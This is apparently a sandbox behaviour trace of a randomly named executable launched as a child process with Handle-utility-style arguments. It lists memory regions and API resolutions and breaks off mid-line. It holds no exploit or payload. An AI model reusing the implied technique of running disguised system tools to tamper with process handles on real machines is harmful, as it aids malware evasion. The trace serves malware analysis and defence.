image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x179d1000" os_pid = "0x708" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x804" cmd_line = "vIDhS3md.exe -accepteula -c -y -p handles -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7526 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7527 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7528 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7529 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7530 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7531 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7532 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 7533 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7534 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7535 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 7536 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7537 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7538 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7539 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7540 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7541 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7542 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7543 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7544 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 7545 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7546 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7547 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7548 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7549 start_va = 0x480000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7550 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7551 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7552 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7553 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7554 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7555 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7556 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7557 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7558 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7559 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7560 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7561 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 7562 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7563 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7564 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7565 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7566 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 7567 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7568 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7569 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7570 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7599 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7600 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7601 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7602 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7603 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7604 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7605 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 7606 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7607 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7608 start_va = 0x2d0000 end_va = 0x2f9fff entry_point = 0x2d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7609 start_va = 0x6f0000 end_va = 0x877fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 7610 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7611 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7612 start_va = 0x880000 end_va = 0xa00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 7613 start_va = 0xa10000 end_va = 0x1e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 7614 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7615 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7616 start_va = 0x340000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7617 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Thread: id = 890 os_tid = 0x120 [0273.732] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0273.732] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0273.733] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0273.734] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0273.735] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0273.736] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0273.737] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0273.738] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0273.738] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0273.738] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0273.738] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0273.738] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0273.739] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0273.739] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0273.739] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0273.739] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0273.739] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0273.739] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0273.739] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0273.739] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0273.739] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0273.739] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0273.739] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0273.739] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0273.739] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0273.739] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0273.740] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0273.740] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0273.740] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0273.740] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0273.740] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0273.740] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0273.740] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0273.740] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0273.740] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0273.740] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0273.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x50a5bc45, dwHighDateTime=0x1d45ac6)) [0273.740] GetCurrentThreadId () returned 0x120 [0273.740] GetCurrentProcessId () returned 0x708 [0273.740] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=32120296290) returned 1 [0273.741] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0273.741] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0273.742] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0273.743] GetProcAddress (hModule=0x75130000, 